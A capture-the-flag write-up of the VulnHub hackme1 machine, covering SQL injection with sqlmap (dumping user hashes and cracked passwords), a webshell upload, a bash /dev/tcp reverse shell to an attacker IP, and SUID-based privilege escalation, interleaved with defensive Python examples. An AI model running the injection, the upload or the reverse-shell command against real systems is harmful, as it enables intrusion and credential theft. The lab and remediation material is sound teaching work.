vulnhub - hackme1

Posted by Mar10 on 2024-06-13


Information gathering

Port scan


Detailed scan


Directory scanning and vulnerability probing turned up nothing useful, apart from the login page and an uploads directory that presumably only becomes usable after getting into the back end.

The web home page is a login/registration form. A quick brute-force against admin did not get in, so I simply registered an account and logged in.


SQL injection

Clicking the search button shows a book catalogue. A structure like this immediately suggests SQL injection, and the query goes out as a POST request.


The test succeeds, so it is time for sqlmap. Capture the POST request and save it as data.txt.
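The search endpoint is injectable because user input is spliced into the SQL text. The following Python is an added example, not code from the target VM or the writeup: it rebuilds a minimal catalogue with an in-memory SQLite table (the table contents are constructed and are not the VM's real schema) and puts the string-concatenated query next to a parameterized one, so the fix is visible in the same place as the defect.

```python
import sqlite3

# Constructed sample rows standing in for the target's "books" table.
# The "visibility" column exists only to show that a tautology in the
# WHERE clause bypasses the row filter the application intended.
BOOKS = [
    ("Hackers", "Steven Levy", "public"),
    ("The Cuckoo's Egg", "Cliff Stoll", "public"),
    ("Internal Procurement", "Staff", "restricted"),
]

# Classic tautology input, kept here only to show the two functions diverge.
TAUTOLOGY_INPUT = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory catalogue so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (title TEXT, author TEXT, visibility TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", BOOKS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """String-built query: the search term becomes part of the SQL text.

    The operator precedence of AND over OR means a tautology in the
    term disables the visibility filter as well as the title match.
    """
    sql = (
        "SELECT title FROM books "
        f"WHERE title LIKE '%{term}%' AND visibility = 'public'"
    )
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    """Bound parameter: the driver passes the term as data, never as SQL."""
    sql = "SELECT title FROM books WHERE title LIKE ? AND visibility = 'public'"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


if __name__ == "__main__":
    db = make_db()
    print("normal term, vulnerable:    ", search_vulnerable(db, "Hack"))
    print("tautology, vulnerable:      ", search_vulnerable(db, TAUTOLOGY_INPUT))
    print("tautology, parameterized:   ", search_parameterized(db, TAUTOLOGY_INPUT))
```

With a normal term both functions return the same row. With the tautology the vulnerable version returns every row, including the restricted one, while the parameterized version returns nothing because no title literally contains the quote characters. Parameterization is the fix sqlmap's findings call for; input filtering on the form is not a substitute.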


sqlmap -r data.txt --level 3 --dbs --batch

[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking


sqlmap -r data.txt --level 3 -D webapphacking --tables --batch

+-------+
| books |
| users |
+-------+


sqlmap -r data.txt --level 3 -D webapphacking -T users --columns --batch

+---------+----------------------+
| Column  | Type                 |
+---------+----------------------+
| name    | varchar(30)          |
| user    | varchar(30)          |
| address | varchar(50)          |
| id      | smallint(5) unsigned |
| pasword | varchar(70)          |
+---------+----------------------+

sqlmap -r data.txt --level 3 -D webapphacking -T users -C name,user,pasword --dump --batch

+--------------+------------+---------------------------------------------+
| name         | user       | pasword                                     |
+--------------+------------+---------------------------------------------+
| David        | user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| Beckham      | user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| anonymous    | user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| testismyname | test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin   | superadmin | 2386acb2cf356944177746fc92523983            |
| test1        | test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 123          | test123    | 4297f44b13955235245b2497399d7a93 (123123)   |
+--------------+------------+---------------------------------------------+

Looking up the plaintext for the superadmin hash gives Uncrackable.
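Every password in the dump fell to a lookup because the application stored unsalted MD5: the digest for "hello" is recognisable on sight, and the users test and test1 share an identical digest because they share a password. The following Python is an added example, not code from the VM or the writeup. It reproduces the legacy scheme only far enough to confirm the first hash in the table, then shows salted PBKDF2-HMAC-SHA256 from the standard library as the replacement, with a constant-time comparison on verification. The storage format string is my own convention.

```python
import hashlib
import hmac
import os
from typing import Optional

# Iteration count chosen for this example; raise it as hardware allows.
PBKDF2_ITERATIONS = 600_000


def md5_hex(password: str) -> str:
    """Legacy scheme seen in the dump: unsalted MD5, reversible by lookup table.

    Two users with the same password get the same digest, which the dump
    on the page shows for "test" and "test1".
    """
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256.

    Output format (own convention): pbkdf2$<iterations>$<salt hex>$<digest hex>.
    A fresh random salt per user means equal passwords no longer collide.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return f"pbkdf2${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("md5('hello')          :", md5_hex("hello"))
    print("md5 repeat collides   :", md5_hex("testtest") == md5_hex("testtest"))
    a, b = hash_password("testtest"), hash_password("testtest")
    print("pbkdf2 repeat collides:", a == b)
    print("verify ok             :", verify_password("testtest", a))
```

The first line of output is the digest shown for user1 in the dump. The two PBKDF2 hashes of the same password differ because each carries its own salt, so a leaked table no longer reveals which accounts share a password, and each guess has to be run through the full iteration count per account.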


File upload

Once logged in, there is indeed a file upload.


There is no filtering, so a one-line webshell uploads directly; the file lands in the uploads directory found earlier.
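The upload handler accepted any file and stored it under the client-supplied name inside a web-served directory, which is what turned an upload form into code execution. The following Python is an added example, not code from the VM or the writeup: a validation routine that allowlists image extensions, rejects multiple extensions, checks the file's leading bytes against the declared type, and hands back a server-generated filename. The allowlist, the magic-byte table and the storage path are assumptions chosen for the example.

```python
import os
import secrets

# Constructed allowlist: accepted extension -> leading bytes the content must have.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Hypothetical storage location outside the document root, so nothing
# placed here can be requested or executed by the web server directly.
UPLOAD_DIR = "/var/app/uploads_private"


def validate_upload(filename: str, content: bytes):
    """Return (True, ext) for an acceptable upload, else (False, reason).

    Only the base name is considered, so path components in the client
    name cannot steer the file elsewhere. Exactly one extension is
    required, it must be on the allowlist, and the content must start
    with the bytes expected for that type.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED_MAGIC:
        return False, f"extension .{ext} not allowed"
    if not content.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match declared type"
    return True, ext


def stored_name(ext: str) -> str:
    """Random server-chosen name; the client's filename is never reused."""
    return f"{secrets.token_hex(16)}.{ext}"


def save_upload(filename: str, content: bytes, upload_dir: str = UPLOAD_DIR) -> str:
    """Validate, then write under a random name. Raises ValueError on rejection."""
    ok, detail = validate_upload(filename, content)
    if not ok:
        raise ValueError(detail)
    path = os.path.join(upload_dir, stored_name(detail))
    with open(path, "wb") as fh:
        fh.write(content)
    return path


if __name__ == "__main__":
    # Constructed sample submissions.
    print(validate_upload("cover.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    print(validate_upload("shell.php", b"<?php echo 1; ?>"))
    print(validate_upload("shell.php.jpg", b"\xff\xd8\xff\xe0"))
    print(validate_upload("cover.png", b"<?php echo 1; ?>"))
```

The content check matters as much as the extension check: a script renamed to .png fails on its leading bytes. The remaining control is where files land; a directory outside the document root, or one served with script execution disabled, means even a file that slips through is served as bytes rather than run.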


Reverse shell and privilege escalation

Reverse shell via AntSword

bash -c 'bash -i >& /dev/tcp/192.168.157.161/9999 0>&1'


Use find to look for files with the SUID bit set

find / -perm -u=s -type f 2>/dev/null

This turns up a suspicious file, /home/legacy/touchmenot; inspecting it shows it is a binary.
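The `find / -perm -u=s -type f` enumeration above is just as useful from the defender's side: run it against a baseline of the SUID binaries a host is supposed to carry, and a stray file like /home/legacy/touchmenot stands out immediately. The following Python is an added example, not code from the VM or the writeup. It walks a tree, collects regular files with the SUID bit (the same test find performs), and reports anything not in the baseline as well as baseline entries that have gone missing. The baseline set is constructed for the example, and demo_tree builds a small constructed directory so the audit can run without touching the real filesystem.

```python
import os
import stat
import tempfile

# Constructed baseline; a real one is generated from a known-good image of
# the same distribution and kept under change control.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}


def is_suid_regular(mode: int) -> bool:
    """True for a regular file whose mode carries the set-user-ID bit."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root: str) -> set:
    """Equivalent of: find ROOT -perm -u=s -type f 2>/dev/null."""
    hits = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable entries are skipped, like 2>/dev/null
            if is_suid_regular(st.st_mode):
                hits.add(path)
    return hits


def audit_suid(root: str, baseline: set = BASELINE) -> dict:
    """Diff the live SUID set against the baseline."""
    found = find_suid(root)
    return {"unexpected": found - baseline, "missing": baseline - found}


def demo_tree():
    """Constructed directory: one SUID file named after the finding, one plain file.

    Returns (root, suid_path, plain_path). The file bodies are stubs, not
    executables; only the mode bits matter for the audit.
    """
    root = tempfile.mkdtemp(prefix="suid_audit_")
    suid_path = os.path.join(root, "touchmenot")
    plain_path = os.path.join(root, "plain")
    for p in (suid_path, plain_path):
        with open(p, "wb") as fh:
            fh.write(b"stub")
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return root, suid_path, plain_path


if __name__ == "__main__":
    root, suid_path, plain_path = demo_tree()
    # Treating the plain file as the only approved entry makes both
    # report categories visible.
    print(audit_suid(root, {plain_path}))
    # Against the real host (slow on large trees):
    # print(audit_suid("/")["unexpected"])
```

Running the audit from cron and alerting on a non-empty "unexpected" set catches a binary dropped with mode 4755 in a home directory the moment it appears; the "missing" set catches a legitimate SUID binary being replaced by a copy without the bit, which is a common side effect of tampering.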


Just try running it


Privileges escalate directly to root.